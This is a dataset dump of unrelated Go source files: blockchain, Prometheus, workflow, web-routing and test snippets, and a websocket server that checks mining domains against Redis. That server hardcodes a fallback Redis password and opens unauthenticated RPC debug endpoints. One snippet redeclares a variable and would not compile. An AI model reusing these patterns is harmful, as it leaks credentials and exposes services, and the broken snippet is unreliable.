text stringlengths 11 4.05M |
|---|
package LICY_BLC
import "fmt"
func (cli *Licy_CLI) Licy_getBalance(address string) {
blockchain := Licy_GetBlochChainObject()
defer blockchain.Licy_DB.Close()
utxoSet := &Licy_UTXOSet{blockchain}
amount := utxoSet.Licy_GetBalance(address)
fmt.Printf("%s一共有%d个Token\n",address,amount)
} |
package main
import (
"log"
"time"
confluent "github.com/confluentinc/confluent-kafka-go/kafka"
"github.com/etf1/kafka-transformer/pkg/instrument"
"github.com/prometheus/client_golang/prometheus"
)
type promCollector struct {
name string
consumeDurationGauge, transformDurationGauge, produceDurationGauge, projectDurationGauge, overallDurationGauge *prometheus.GaugeVec
consumeCounter, transformCounter, produceCounter, projectCounter, overallCounter *prometheus.CounterVec
consumeDurationHistogram, transformDurationHistogram, produceDurationHistogram, projectDurationHistogram, overallDurationHistogram *prometheus.HistogramVec
}
// NewCollector create a prometheus collector
func NewCollector(name string) instrument.Collector {
pc := promCollector{
name: name,
// gauges
consumeDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "consume_gauge_duration_seconds",
Help: "Current consume duration in seconds",
},
[]string{"name", "status"},
),
transformDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "transform_gauge_duration_seconds",
Help: "Current transform duration in seconds",
},
[]string{"name", "status"},
),
produceDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "produce_gauge_duration_seconds",
Help: "Current produce duration in seconds",
},
[]string{"name", "status"},
),
projectDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "project_gauge_duration_seconds",
Help: "Current project duration in seconds",
},
[]string{"name", "status"},
),
overallDurationGauge: prometheus.NewGaugeVec(
prometheus.GaugeOpts{
Namespace: "kafka_transformer",
Name: "overall_gauge_duration_seconds",
Help: "Current overall duration in seconds",
},
[]string{"name", "status"},
),
// counters
consumeCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "consume_counter_total",
Help: "The number of consumed messages from a kafka topic",
},
[]string{"name", "status"},
),
transformCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "transform_counter_total",
Help: "The number of transformed messages",
},
[]string{"name", "status"},
),
produceCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "produce_counter_total",
Help: "The number of produced messages to a kafka topic",
},
[]string{"name", "status"},
),
projectCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "project_counter_total",
Help: "The number of projected messages",
},
[]string{"name", "status"},
),
overallCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Namespace: "kafka_transformer",
Name: "overall_counter_total",
Help: "The number of messages processed by the transformer from consumption to projection",
},
[]string{"name", "status"},
),
// histograms
consumeDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "consume_hist_duration_seconds",
Help: "The consumption duration in seconds",
},
[]string{"name", "status"},
),
transformDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "transform_hist_duration_seconds",
Help: "The transformed duration in seconds",
},
[]string{"name", "status"},
),
produceDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "produce_hist_duration_seconds",
Help: "The produced duration in seconds",
},
[]string{"name", "status"},
),
projectDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "project_hist_duration_seconds",
Help: "The projection duration in seconds",
},
[]string{"name", "status"},
),
overallDurationHistogram: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Namespace: "kafka_transformer",
Name: "overall_hist_duration_seconds",
Help: "The overall duration in seconds",
},
[]string{"name", "status"},
),
}
prometheus.MustRegister(pc.consumeDurationGauge, pc.transformDurationGauge, pc.produceDurationGauge, pc.projectDurationGauge, pc.overallDurationGauge)
prometheus.MustRegister(pc.consumeCounter, pc.transformCounter, pc.produceCounter, pc.projectCounter, pc.overallCounter)
prometheus.MustRegister(pc.consumeDurationHistogram, pc.transformDurationHistogram, pc.produceDurationHistogram, pc.projectDurationHistogram, pc.overallDurationHistogram)
return &pc
}
func (p promCollector) Before(message *confluent.Message, action instrument.Action, start time.Time) {
log.Printf("PromCollector Before: %v %v %v", message, action, start)
}
func (p promCollector) After(message *confluent.Message, action instrument.Action, err error, start time.Time) {
now := time.Now()
log.Printf("PromCollector After: %v %v %v %v", message, action, err, start)
status := "success"
if err != nil {
status = "failed"
}
var (
gauge *prometheus.GaugeVec
counter *prometheus.CounterVec
hist *prometheus.HistogramVec
)
switch action {
case instrument.KafkaConsumerConsume:
gauge = p.consumeDurationGauge
counter = p.consumeCounter
hist = p.consumeDurationHistogram
case instrument.TransformerTransform:
gauge = p.transformDurationGauge
counter = p.transformCounter
hist = p.transformDurationHistogram
case instrument.KafkaProducerProduce:
gauge = p.produceDurationGauge
counter = p.produceCounter
hist = p.produceDurationHistogram
case instrument.ProjectorProject:
gauge = p.projectDurationGauge
counter = p.projectCounter
hist = p.projectDurationHistogram
case instrument.OverallTime:
gauge = p.overallDurationGauge
counter = p.overallCounter
hist = p.overallDurationHistogram
}
if gauge != nil {
gauge.WithLabelValues(p.name, status).Set(now.Sub(start).Seconds())
}
if counter != nil {
counter.WithLabelValues(p.name, status).Inc()
}
if hist != nil {
hist.WithLabelValues(p.name, status).Observe(now.Sub(start).Seconds())
}
}
|
package main
import "fmt"
func main() {
mySlice := []int{42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52}
fmt.Println(mySlice[:5])
fmt.Println(mySlice[5:10])
fmt.Println(mySlice[2:7])
fmt.Println(mySlice[1:6])
}
|
package states
import (
"context"
"errors"
"fmt"
"time"
derrors "github.com/direktiv/direktiv/pkg/flow/errors"
log "github.com/direktiv/direktiv/pkg/flow/internallogger"
"github.com/direktiv/direktiv/pkg/model"
"github.com/senseyeio/duration"
)
func init() {
RegisterState(model.StateTypeDelay, Delay)
}
type delayLogic struct {
*model.DelayState
Instance
}
// Delay initializes the logic for executing a 'delay' state in a Direktiv workflow instance.
func Delay(instance Instance, state model.State) (Logic, error) {
delay, ok := state.(*model.DelayState)
if !ok {
return nil, derrors.NewInternalError(errors.New("bad state object"))
}
sl := new(delayLogic)
sl.Instance = instance
sl.DelayState = delay
return sl, nil
}
// Deadline overwrites the default underlying Deadline function provided by Instance because
// Delay is a multi-step state.
func (logic *delayLogic) Deadline(ctx context.Context) time.Time {
d, err := duration.ParseISO8601(logic.Duration)
if err != nil {
logic.Log(ctx, log.Error, "failed to parse duration: %v", err)
return time.Now().UTC().Add(DefaultShortDeadline)
}
t := d.Shift(time.Now().UTC().Add(DefaultShortDeadline))
return t
}
// Run implements the Run function for the Logic interface.
//
// The 'delay' state does nothing except pause the workflow for a specified length of time. To
// achieve this, the state must be scheduled in twice. The first time Run is called the state
// schedules its own wakeup. The second time Run is called should be in response to the scheduled
// wakeup.
//
// In every other way, the 'delay' state is equivalent to the 'noop' state. It should only fail
// if performs unnecessary validation on its arguments and finds them broken.
func (logic *delayLogic) Run(ctx context.Context, wakedata []byte) (*Transition, error) {
first, err := scheduleTwiceConst(logic, wakedata, `""`)
if err != nil {
return nil, err
}
if first {
var d duration.Duration
d, err = duration.ParseISO8601(logic.Duration)
if err != nil {
return nil, derrors.NewInternalError(fmt.Errorf("failed to parse delay duration: %w", err))
}
t0 := time.Now().UTC()
t := d.Shift(t0)
err = logic.Sleep(ctx, t.Sub(t0), "")
if err != nil {
return nil, err
}
//nolint:nilnil
return nil, nil
}
logic.Log(ctx, log.Info, "Waking up from sleep.")
return &Transition{
Transform: logic.Transform,
NextState: logic.Transition,
}, nil
}
|
package bsutils
import (
"strconv"
"time"
)
func StringToIntWithDefault(s string, def int) int {
i, err := strconv.Atoi(s)
if err != nil {
return def
}
return i
}
func StringToInt64WithDefault(s string, def int64) int64 {
i, err := strconv.ParseInt(s, 10, 64)
if err != nil {
return def
}
return i
}
func StringToFloat64WithDefault(s string, def float64) float64 {
i, err := strconv.ParseFloat(s, 64)
if err != nil {
return def
}
return i
}
func StringToDateWithDefault(s string, def time.Time, formats ...string) time.Time {
if len(formats) == 0 {
formats = []string{}
}
formats = append(formats, time.RFC3339, time.RFC3339Nano, time.RFC1123Z, time.RFC1123)
for _, f := range formats {
if t, err := time.Parse(f, s); err == nil {
return t
}
}
return def
}
|
// Copyright (c) 2020 by meng. All rights reserved.
// Use of this source code is governed by an MIT-style
// license that can be found in the LICENSE file.
/**
* @Author: meng
* @Description:
* @File: behavior_Work
* @Version: 1.0.0
* @Date: 2020/4/15 01:05
*/
package base_behavior
import (
"fmt"
"github.com/mx5566/behavior-tree/common"
)
type BehaviorWork struct {
}
//当节点调用前
func (this *BehaviorWork) OnInitialize(inter interface{}) {
}
//节点操作的具体实现
func (this *BehaviorWork) Update(inter interface{}) common.StatusType {
fmt.Println("BaseBehavior Update Address ")
return common.Status_Invalid
}
//节点调用后执行
func (this *BehaviorWork) OnTerminate(statusType common.StatusType) {
}
|
package render
import (
"fmt"
"github.com/spf13/cobra"
"github.com/werf/werf/cmd/werf/common"
"github.com/werf/werf/pkg/config"
"github.com/werf/werf/pkg/git_repo"
"github.com/werf/werf/pkg/git_repo/gitdata"
"github.com/werf/werf/pkg/true_git"
"github.com/werf/werf/pkg/werf"
)
var commonCmdData common.CmdData
func NewCmd() *cobra.Command {
cmd := &cobra.Command{
Use: "render [IMAGE_NAME...]",
DisableFlagsInUseLine: true,
Short: "Render werf.yaml",
RunE: func(cmd *cobra.Command, args []string) error {
ctx := common.BackgroundContext()
if err := common.ProcessLogOptions(&commonCmdData); err != nil {
common.PrintHelp(cmd)
return err
}
if err := werf.Init(*commonCmdData.TmpDir, *commonCmdData.HomeDir); err != nil {
return fmt.Errorf("initialization error: %s", err)
}
gitDataManager, err := gitdata.GetHostGitDataManager(ctx)
if err != nil {
return fmt.Errorf("error getting host git data manager: %s", err)
}
if err := git_repo.Init(gitDataManager); err != nil {
return err
}
if err := true_git.Init(true_git.Options{LiveGitOutput: *commonCmdData.LogVerbose || *commonCmdData.LogDebug}); err != nil {
return err
}
giterminismManager, err := common.GetGiterminismManager(&commonCmdData)
if err != nil {
return err
}
configOpts := common.GetWerfConfigOptions(&commonCmdData, false)
customWerfConfigRelPath, err := common.GetCustomWerfConfigRelPath(giterminismManager, &commonCmdData)
if err != nil {
return err
}
customWerfConfigTemplatesDirRelPath, err := common.GetCustomWerfConfigTemplatesDirRelPath(giterminismManager, &commonCmdData)
if err != nil {
return err
}
return config.RenderWerfConfig(common.BackgroundContext(), customWerfConfigRelPath, customWerfConfigTemplatesDirRelPath, args, giterminismManager, configOpts)
},
}
common.SetupDir(&commonCmdData, cmd)
common.SetupGitWorkTree(&commonCmdData, cmd)
common.SetupConfigTemplatesDir(&commonCmdData, cmd)
common.SetupConfigPath(&commonCmdData, cmd)
common.SetupEnvironment(&commonCmdData, cmd)
common.SetupGiterminismOptions(&commonCmdData, cmd)
common.SetupTmpDir(&commonCmdData, cmd)
common.SetupHomeDir(&commonCmdData, cmd)
common.SetupLogOptions(&commonCmdData, cmd)
return cmd
}
|
package gherkin
import (
"testing"
. "github.com/tychofreeman/go-matchers"
"io"
)
type MockScenario struct {
rpt Report
}
func (ms MockScenario) AddStep(s step) {
}
func (ms MockScenario) Last() *step {
return nil
}
func (ms MockScenario) Execute([]stepdef, io.Writer, interface{}) Report {
return ms.rpt
}
func (ms MockScenario) IsBackground() bool {
return false
}
func (ms MockScenario) IsJustPrintable() bool {
return false
}
func TestReportsNumberOfScenarios(t *testing.T) {
scenarios := []Scenario{
MockScenario{rpt:Report{0,0,0,1,0,0}},
}
r := createWriterlessRunner()
rpt := r.executeScenarios(scenarios)
AssertThat(t, rpt.scenarioCount, Equals(1))
}
func TestReportsNumberOfStepsInScenarios(t *testing.T) {
scenarios := []Scenario{
MockScenario{rpt:Report{0,2,2,2,2,2}},
}
r := createWriterlessRunner()
rpt := r.executeScenarios(scenarios)
AssertThat(t, rpt.pendingSteps, Equals(2))
AssertThat(t, rpt.skippedSteps, Equals(2))
AssertThat(t, rpt.passedSteps, Equals(2))
AssertThat(t, rpt.failedSteps, Equals(2))
}
|
// @SubApi 喵喵喵 [/Cat]
package api
import (
"bytes"
"net/http"
"strconv"
ren "github.com/hmgle/swagger-demo/src/render"
)
// @Title api.Miao
// @Description 喵
// @Resource Cat
// @Accept json
// @Param count query int false "喵几声?"
// @Success 200 {string} string "返回"
// @Router /miao [get]
func Miao(w http.ResponseWriter, r *http.Request) {
miao := bytes.Buffer{}
count, err := strconv.Atoi(r.URL.Query().Get("count"))
if err != nil {
ren.Text(w, http.StatusOK, "喵...")
return
}
for i := 0; i < count; i++ {
miao.WriteString("喵~")
}
ren.Text(w, http.StatusOK, miao.String())
}
|
package main
import (
"bufio"
"bytes"
"fmt"
"math"
"os"
"strconv"
"strings"
)
func main() {
s := bufio.NewScanner(os.Stdin)
buff := new(bytes.Buffer)
max := int(math.Pow(10, 5))
buff.Grow(max)
s.Buffer(buff.Bytes(), max)
s.Scan()
temp := strings.Split(s.Text(), " ")
L, _ := strconv.Atoi(temp[0])
R, _ := strconv.Atoi(temp[1])
var max int
for i := L; i <= R; i++ {
for j := L; j <= R; j++ {
xor := i ^ j
if xor > max {
max = xor
}
}
}
fmt.Println(max)
}
|
package main
import (
"net/http"
"github.com/souhub/wecircles/pkg/route"
)
func main() {
files := http.FileServer(http.Dir("web/"))
http.Handle("/static/", http.StripPrefix("/static/", files))
// CSS読み込み用
http.Handle("/resources/", http.StripPrefix("/resources/", http.FileServer(http.Dir("web/css/"))))
http.HandleFunc("/", route.Index)
http.HandleFunc("/about", route.About)
http.HandleFunc("/login", route.Login)
http.HandleFunc("/signup", route.Signup)
http.HandleFunc("/signup_account", route.SignupAccount)
http.HandleFunc("/authenticate", route.Authenticate)
http.HandleFunc("/logout", route.Logout)
http.HandleFunc("/post/new", route.NewPost)
http.HandleFunc("/post/create", route.CreatePost)
http.HandleFunc("/posts/manage", route.PostsManage)
http.HandleFunc("/post", route.ShowPost)
http.HandleFunc("/post/edit", route.EditPost)
http.HandleFunc("/post/update", route.UpdatePost)
http.HandleFunc("/post/delete", route.DeletePost)
http.HandleFunc("/user/edit", route.EditUser)
http.HandleFunc("/user/update", route.UpdateUser)
http.HandleFunc("/user", route.User)
http.HandleFunc("/user/delete/confirm", route.DeleteUserConfirm)
http.HandleFunc("/user/delete", route.DeleteUser)
http.HandleFunc("/circle", route.Circle)
http.HandleFunc("/circles", route.Circles)
http.HandleFunc("/circle/manage", route.CircleManage)
http.HandleFunc("/circle/manage/members", route.CircleManageMembers)
http.HandleFunc("/circle/new", route.NewCircle)
http.HandleFunc("/circle/create", route.CreateCircle)
http.HandleFunc("/circle/edit", route.EditCircle)
http.HandleFunc("/circle/update", route.UpdateCircle)
http.HandleFunc("/circle/delete", route.DeleteCircle)
http.HandleFunc("/circle/memberships", route.MembershipsCircles)
http.HandleFunc("/circle/membership/create", route.MembershipsCircleCreate)
http.HandleFunc("/circle/membership/delete", route.DeleteMembership)
http.HandleFunc("/circle/membership/delete/byowner", route.DeleteMembershipByOwner)
http.HandleFunc("/circle/tweets", route.TweetsCircle)
http.HandleFunc("/circle/settings", route.SettingsCircle)
http.HandleFunc("/chat/create", route.CreateChat)
http.HandleFunc("/chat/delete", route.DeleteChat)
http.ListenAndServe(":80", nil)
}
|
package main
import (
"bufio"
"errors"
"flag"
"fmt"
"html/template"
"net"
"net/http"
"net/rpc"
"os"
"os/exec"
"runtime/pprof"
"strings"
"sync"
"sync/atomic"
"syscall"
"time"
"github.com/garyburd/redigo/redis"
"github.com/gorilla/websocket"
"github.com/sirupsen/logrus"
)
const (
HEAD_LEN = 64
TCP_QUICK_ACK = 1
TCP_NO_DELAY = 2
)
var homeTemplate = template.Must(template.New("").Parse(`
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
window.addEventListener("load", function(evt) {
var output = document.getElementById("output");
var input = document.getElementById("input");
var ws;
var print = function(message) {
var d = document.createElement("div");
d.innerHTML = message;
output.appendChild(d);
};
document.getElementById("open").onclick = function(evt) {
if (ws) {
return false;
}
ws = new WebSocket("{{.}}");
ws.onopen = function(evt) {
print("OPEN");
}
ws.onclose = function(evt) {
print("CLOSE");
ws = null;
}
ws.onmessage = function(evt) {
print("RESPONSE: " + evt.data);
}
ws.onerror = function(evt) {
print("ERROR: " + evt.data);
}
return false;
};
document.getElementById("send").onclick = function(evt) {
if (!ws) {
return false;
}
print("SEND: " + input.value);
ws.send(input.value);
return false;
};
document.getElementById("close").onclick = function(evt) {
if (!ws) {
return false;
}
ws.close();
return false;
};
});
</script>
</head>
<body>
<table>
<tr><td valign="top" width="50%">
<p>Click "Open" to create a connection to the server,
"Send" to send a message to the server and "Close" to close the connection.
You can change the message and send multiple times.
<p>
<form>
<button id="open">Open</button>
<button id="close">Close</button>
<p><input id="input" type="text" value="Hello world!">
<button id="send">Send</button>
</form>
</td><td valign="top" width="50%">
<div id="output"></div>
</td></tr></table>
</body>
</html>
`))
var upgrader = websocket.Upgrader{
CheckOrigin: func(r *http.Request) bool {
return true
},
}
var FAILED = errors.New("FAILED")
var RedisPasswordPath string = "/opt/nubosh/vmsec-ctrl/redis/conf/redis_threatInfo.conf"
var Cmd string = "/opt/nubosh/vmsec-ctrl/bin/aescrypt"
var MineRulesEnc string = "/opt/nubosh/vmsec-ctrl/data/ioc/mine.rules"
var MineRulesDec string = "/opt/nubosh/vmsec-ctrl/data/ioc/mine_dec.rules"
var LogFile string = "/opt/nubosh/commonlog/bin/log/websocket_server.log"
var CpuProfLogFile string = "/opt/nubosh/commonlog/bin/log/websocket_server_CPU_prof"
var MemProfLogFile string = "/opt/nubosh/commonlog/bin/log/websocket_server_Mem_prof"
var RedisPasswd string //保存从redis.conf文件中提取出来的redis密码
var gMineRules sync.Map //本地缓存数据,用于快速查询
var gRedisConn sync.Map //保存client和链接redis的对应关系
var gOutTimeCnt uint32 //超时数据统计
var log *logrus.Logger //记录日志的句柄
var cpuProfFile *os.File //性能统计的文件句柄
var memProfFile *os.File //内存统计的文件句柄
var logLevel = flag.Int("logLevel", 4, "Panic:0, Fatal:1, Error:2, Warn:3, Info:4, Debug:5, Trace:6. ex: -logLevel 5")
var addr = flag.String("addr", "localhost:33873", "http service address")
type RpcCmd int //RPC的对象
type RedisConn struct {
conn redis.Conn
statTimeout uint32
}
/* client连接,传输数据处理函数 */
func echo(w http.ResponseWriter, r *http.Request) {
log.Debugf("recv:echo")
c, err := upgrader.Upgrade(w, r, nil)
if err != nil {
log.Errorf("Upgrade error: %s", err)
return
}
connnectRedis(c)
setTcpOption(c.GetNetConn(), TCP_NO_DELAY)
defer connClose(c)
for {
mt, message, err := c.ReadMessage()
if err != nil {
if websocket.IsUnexpectedCloseError(err, websocket.CloseGoingAway, websocket.CloseAbnormalClosure) {
log.Errorf("IsUnexpectedCloseError : %s", err)
}
break
}
log.Debugf("recv: %+v, len:%d", message, len(message))
if len(message) < HEAD_LEN {
log.Debugf("message len should be > %d", HEAD_LEN)
return
}
head := message[:HEAD_LEN]
key := message[HEAD_LEN:]
log.Debugf("key: %s", key)
t := time.Now()
val, _ := searchMineRules(string(key), c)
tDur := time.Since(t)
if tDur > 2000000 {
atomic.AddUint32(&gOutTimeCnt, 1)
log.Warnf("get %s time out : %v cnt(%v)", key, tDur, gOutTimeCnt)
}
log.Debugf("data: %s", val)
data := append(head[:], []byte(val)...)
err = c.WriteMessage(mt, data)
if err != nil {
log.Errorf("write error: %s", err)
break
}
}
}
func home(w http.ResponseWriter, r *http.Request) {
log.Debugf("Recv home: %s", r.Host)
homeTemplate.Execute(w, "ws://"+r.Host+"/websocket")
}
func connnectRedis(c *websocket.Conn) {
log.Debugf("conn %s connnect Redis", c.LocalAddr())
var err error
if val, ok := gRedisConn.Load(c); ok {
log.Warnf("%s redis already connected, %v", c.LocalAddr(), val)
return
}
conn, err := redis.Dial("tcp", "127.0.0.1:9736", redis.DialPassword(RedisPasswd))
if err != nil {
log.Errorf("Connect to redis error: %s", err)
return
}
redisConn := RedisConn{conn, 0}
gRedisConn.Store(c, redisConn)
}
/*启动定时器,每12小时把mine.rules刷入本地数据区,更新数据*/
func updateMineRuleLocal() {
loadMineRule()
t := time.NewTicker(12 * time.Hour)
defer t.Stop()
for {
select {
case <-t.C:
loadMineRule()
}
}
}
/*把mine.rules刷入本地数据区*/
func loadMineRule() {
var err error
var wg sync.WaitGroup
log.Debugf("Update mine.rules to local")
/*要把mine.rules文件先解密,调用脚本解密*/
cmd := exec.Command(Cmd, "-dec", MineRulesEnc, MineRulesDec)
if err := cmd.Run(); err != nil {
log.Errorf("aescrypt dec failed", err)
return
}
gMineRules.Range(func(k, v interface{}) bool {
gMineRules.Delete(k)
return true
})
ch := make(chan string, 10000)
rdDonech := make(chan bool)
wg.Add(1)
go func() {
var cnt uint32
defer wg.Done()
for {
select {
case val := <-ch:
key := strings.Split(val, "|")
gMineRules.Store(key[0], (val + "|1")) //这个是加了黑名单,白名单的标记位,1黑2白
cnt++
default:
select {
case val := <-ch:
key := strings.Split(val, "|")
gMineRules.Store(key[0], (val + "|1"))
cnt++
case <-rdDonech:
log.Debugf("WriteDone-- final write redis cnt:%d", cnt)
return
default:
continue
}
}
}
}()
file, err := os.Open(MineRulesDec)
if err != nil {
log.Fatal(err)
}
defer file.Close()
scanner := bufio.NewScanner(file)
scanner.Split(bufio.ScanLines)
//是否有下一行
for scanner.Scan() {
log.Trace("--scanner.Text()--:%s", scanner.Text())
if len(scanner.Text()) > 0 {
ch <- scanner.Text()
}
}
rdDonech <- true
wg.Wait()
/*要把mine.rules的解密文件mine_dec.rules删掉*/
cmd = exec.Command("rm", "-r", "-f", MineRulesDec)
if err := cmd.Run(); err != nil {
log.Errorf("delete mine_dec.rules failed, %s", err)
return
}
}
/*用于设置TCP的option, TCP_QUICKACK 和 TCP_NODELAY*/
func setTcpOption(conn net.Conn, t int) {
tcpConn := conn.(*net.TCPConn)
f, err := tcpConn.File()
if err != nil {
log.Errorf("tcpConn File error: %s", err)
return
}
if t == TCP_QUICK_ACK {
err = syscall.SetsockoptInt(int(f.Fd()), syscall.IPPROTO_TCP, syscall.TCP_QUICKACK, 1)
} else if t == TCP_NO_DELAY {
err = syscall.SetsockoptInt(int(f.Fd()), syscall.IPPROTO_TCP, syscall.TCP_NODELAY, 1)
}
if err != nil {
log.Errorf("setTcpOption ERROR: %s", err)
return
}
}
/*获取redis.conf的密码*/
func GetRedisPassword() string {
file, err := os.Open(RedisPasswordPath)
if err != nil {
log.Fatal(err)
}
defer file.Close()
scanner := bufio.NewScanner(file)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
log.Trace("GetRedisPassword --scanner.Text()--:%s\n", scanner.Text())
if len(scanner.Text()) > 0 {
if strings.Contains(scanner.Text(), "masterauth") {
tmpStr := scanner.Text()
tmpStr = strings.Replace(tmpStr, " ", "", -1)
pw := strings.Split(tmpStr, "masterauth")
return pw[1]
}
}
}
return "ac401b00381832cfe560d811a4e7f665"
}
/*关闭websocket,释放资源*/
func connClose(c *websocket.Conn) {
gRedisConn.Delete(c)
c.Close()
}
/*查找rule,先查本地local cache,查不到就去查redis*/
func searchRule(key string, c *websocket.Conn) (val string, err error) {
if rule, ok := gMineRules.Load(string(key)); ok {
val = rule.(string)
return val, nil
} else {
value, _ := gRedisConn.Load(c)
val, err = redis.String(value.(RedisConn).conn.Do("GET", key))
if err != nil {
log.Errorf("redis get key(%s) failed:%s", key, err)
return "", FAILED
}
return val, nil
}
}
/*
查找domain,如果查不到,就查顶级域名
普通域名 顶级域名
www.tull.coin-miners.info ------------ *coin-miners.info
altcoinpool.com ------------ *altcoinpool.com
*/
func searchMineRules(key string, c *websocket.Conn) (val string, err error) {
val, err = searchRule(key, c)
if err == nil {
return val, nil
}
var domain string
cnt := strings.Count(key, ".")
if cnt > 1 {
tmp := strings.Split(key, ".")
domain = fmt.Sprintf("*%s.%s", tmp[cnt-1], tmp[cnt])
log.Debugf("Search again --, domin: %s", domain)
} else if cnt == 1 {
isDomain := strings.Count(key, "*")
if isDomain == 0 {
domain = fmt.Sprintf("*%s", key)
log.Debugf("search again __, domin: %s", domain)
}
} else {
domain = key
}
val, err = searchRule(domain, c)
if err == nil {
return val, nil
}
return "", FAILED
}
/*初始化日志*/
func LogInit() {
log = logrus.New()
file, err := os.OpenFile(LogFile, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
if err == nil {
log.Out = file
} else {
log.Errorf("Failed to log to file")
}
log.SetLevel(logrus.Level(*logLevel))
}
/*RPC框架调试函数,对当前进程开启CPU prof的打点*/
func (t *RpcCmd) GoprofBegin(args *int, reply *int) error {
cpuProfFile, err := os.OpenFile(CpuProfLogFile, os.O_CREATE|os.O_WRONLY, 0666)
if err != nil {
log.Errorf("Failed to CPU prof log to file. %s", err)
return nil
}
err = pprof.StartCPUProfile(cpuProfFile)
if err != nil {
log.Errorf("Can not start cpu profile: %s", err)
}
return nil
}
/*RPC框架调试函数,关闭当前进程CPU prof的打点*/
func (t *RpcCmd) GoprofEnd(args *int, reply *int) error {
pprof.StopCPUProfile()
cpuProfFile.Close()
return nil
}
/*RPC框架,调试函数,获取当前进程的Mem prof*/
func (t *RpcCmd) MemProf(args *int, reply *int) error {
memProfFile, err := os.OpenFile(MemProfLogFile, os.O_CREATE|os.O_WRONLY, 0666)
if err != nil {
log.Errorf("Failed to mem prof log to file. %s", err)
return nil
}
defer memProfFile.Close()
pprof.Lookup("heap").WriteTo(memProfFile, 1)
return nil
}
/*RPC框架调试函数,设置debug级别*/
func (t *RpcCmd) SetLogLevel(level *int, reply *int) error {
log.Warnf("Log level will be set :%d", *level)
log.SetLevel(logrus.Level(*level))
*reply = 1
return nil
}
/*rpc的server端,提供端口为1234的服务,供client端远程调用调试函数*/
func rpcServer() {
cmd := new(RpcCmd)
rpc.Register(cmd)
rpc.HandleHTTP()
l, e := net.Listen("tcp", ":1234")
if e != nil {
log.Errorf("listen error:", e)
}
go http.Serve(l, nil)
}
func main() {
flag.Parse()
LogInit()
log.Infof("--------------Websocket Server Begin----------------")
go rpcServer()
go updateMineRuleLocal()
RedisPasswd = GetRedisPassword()
http.HandleFunc("/websocket", echo)
http.HandleFunc("/", home)
http.ListenAndServe(*addr, nil)
}
|
package main
import (
_ "fmt"
"github.com/gin-gonic/gin"
"net/http"
"os/exec"
)
func main() {
// updates everything from github
pullFromGithub := exec.Command("git", "pull")
pullFromGithub.Run()
router := gin.Default()
// serves all the html, css, and javascript files to the browser
router.StaticFile("/", "./web/html/index.html")
router.StaticFS("/html", http.Dir("./web/html/"))
router.StaticFS("/css", http.Dir("./web/css/"))
router.StaticFS("/js", http.Dir("./web/js/"))
router.Run()
}
func ping(context *gin.Context) {
context.JSON(200, gin.H{
"message": "pong",
})
}
|
package routers
import (
"github.com/barrydev/api-3h-shop/src/common/response"
"github.com/barrydev/api-3h-shop/src/controllers"
"github.com/gin-gonic/gin"
)
func BindProductItem(router *gin.RouterGroup) {
router.GET("", func(c *gin.Context) {
handle := response.Handle{Context: c}
handle.Try(controllers.GetListProductItem).Then(response.SendSuccess).Catch(response.SendError)
})
router.GET("/:productItemId", func(c *gin.Context) {
handle := response.Handle{Context: c}
handle.Try(controllers.GetProductItemById).Then(response.SendSuccess).Catch(response.SendError)
})
// router.POST("", func(c *gin.Context) {
// handle := response.Handle{Context: c}
// handle.Try(controllers.InsertProductItem).Then(response.SendSuccess).Catch(response.SendError)
// })
// router.POST("/:productItemId/update", func(c *gin.Context) {
// handle := response.Handle{Context: c}
// handle.Try(controllers.UpdateProductItem).Then(response.SendSuccess).Catch(response.SendError)
// })
}
func BindProductItemAdmin(router *gin.RouterGroup) {
router.POST("", func(c *gin.Context) {
handle := response.Handle{Context: c}
handle.Try(controllers.InsertProductItem).Then(response.SendSuccess).Catch(response.SendError)
})
router.POST("/:productItemId/update", func(c *gin.Context) {
handle := response.Handle{Context: c}
handle.Try(controllers.UpdateProductItem).Then(response.SendSuccess).Catch(response.SendError)
})
}
|
package main
const (
START = iota
UPDATE
STARTCHECKPOINT
ENDCHECKPOINT
)
// Undolog record format
// {START, tID, 0, 0}
// {UPDATE, tID, userID, cash}
// {STARTCHECKPOINT, 0, 0, 0}
// {ENDCHECKPOINT, 0, 0, 0}
type Record struct {
Op int
TranscationId int
UserId int
Cash int
}
|
package main
import (
"fmt"
"net/http"
)
// Handler function that responds with Hello World
func helloWorld(w http.ResponseWriter, r *http.Request) {
fmt.Fprintf(w, "Hello world")
fmt.Println("See actions in action?")
}
func main() {
// Register handler function on server route
http.HandleFunc("/api/hello-world-service/v0/ping", helloWorld)
fmt.Println("Listening on localhost:8080")
http.ListenAndServe(":8080", nil)
}
|
package topic
import (
"testing"
. "github.com/smartystreets/goconvey/convey"
)
func TestValidate(t *testing.T) {
Convey(`Testing the Topic validation`, t, func() {
So(Validate("", true), ShouldEqual, errInvalidLength) // All Topic Names and Topic Filters MUST be at least one character long [MQTT-4.7.3-1]
So(Validate("\U00000000", true), ShouldEqual, errInvalidUTF8) // Topic Names and Topic Filters MUST NOT include the null character (Unicode U+0000) [Unicode] [MQTT-4.7.3-2]
So(Validate("#", true), ShouldBeNil)
So(Validate("+", true), ShouldBeNil)
So(Validate("foo", true), ShouldBeNil)
So(Validate("foo/bar", true), ShouldBeNil)
